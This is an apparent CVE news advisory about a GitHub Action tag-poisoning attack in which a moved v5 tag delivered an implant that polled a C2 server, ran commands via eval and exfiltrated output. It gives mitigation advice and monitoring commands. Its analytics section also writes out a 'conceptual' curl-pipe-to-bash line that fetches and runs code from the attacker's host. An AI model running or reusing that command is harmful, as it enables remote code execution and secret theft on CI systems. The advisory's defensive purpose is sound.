GitHub Action, Tag Poisoning, CVE-2026-31976 (Critical)

Listen to this Post

On March 3, 2026, an attacker used compromised credentials to create pull requests injecting obfuscated shell code into the `xygeni/xygeni-action` repository. Though branch protection blocked the PRs from merging, the attacker leveraged compromised GitHub App credentials with broad permissions to move the mutable `v5` tag. This tag was forcefully updated to point at the malicious commit (4bf1d4e) from the unmerged PR, which remained in the repository’s object store. Consequently, any GitHub Actions workflow referencing `xygeni/xygeni-action@v5` would fetch and execute this malicious code without any visible change to the workflow definition. The malicious implant registered the CI runner with a command-and-control (C2) server at 91.214.78.178, exfiltrating hostname, username, and OS. It then polled the C2 server every 2–7 seconds for 180 seconds, using `eval` to execute arbitrary shell commands received from the attacker. Command output was compressed, base64-encoded, and exfiltrated. The implant ran silently alongside the legitimate scan, suppressed errors, skipped TLS verification, and used randomized polling intervals to evade detection. This tag poisoning allowed the attacker to achieve arbitrary code execution on any CI runner using the compromised tag during the exposure window. The root cause was a GitHub App private key with unnecessarily broad permissions being compromised, which, combined with a maintainer’s personal access token (PAT), allowed the attacker to both create the PR and move the tag . This represents a critical supply chain compromise via a mutable reference .

dailycve form:

Platform: GitHub Action
Version: v5 tag
Vulnerability : Tag poisoning C2
Severity: Critical
date: 2026-03-11

Prediction: Patched 2026-03-10

What Undercode Say:

Analytics:

Simulate checking for outbound connections to the C2 server
sudo tcpdump -i any host 91.214.78.178 -c 10
Simulate checking DNS queries for the malicious domain
sudo tcpdump -i any port 53 -v | grep "security-verify.nip.io"
Search CI logs for the C2 IP (conceptual example for a log analysis tool)
grep -r "91.214.78.178" /var/log/ci-runner/
Example of how the malicious eval might have been invoked (conceptual)
curl -s http://security-verify.91.214.78.178.nip.io/poll | bash

How Exploit:

Attacker compromises GitHub App key. Forces git tag `v5` to malicious commit . CI runners fetch poisoned action. Implant phones home for commands. Attacker executes arbitrary code via `eval` .

Protection from this CVE

Pin actions to immutable commit SHAs, never tags . Enforce SHA pinning via organization policy . Restrict GitHub App and token permissions to least privilege . Audit all actions and monitor network logs .

Impact:

Complete CI/CD runner compromise. Theft of all accessible secrets (GITHUB_TOKEN, cloud keys). Potential backdooring of release artifacts. Supply chain attack on downstream users .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top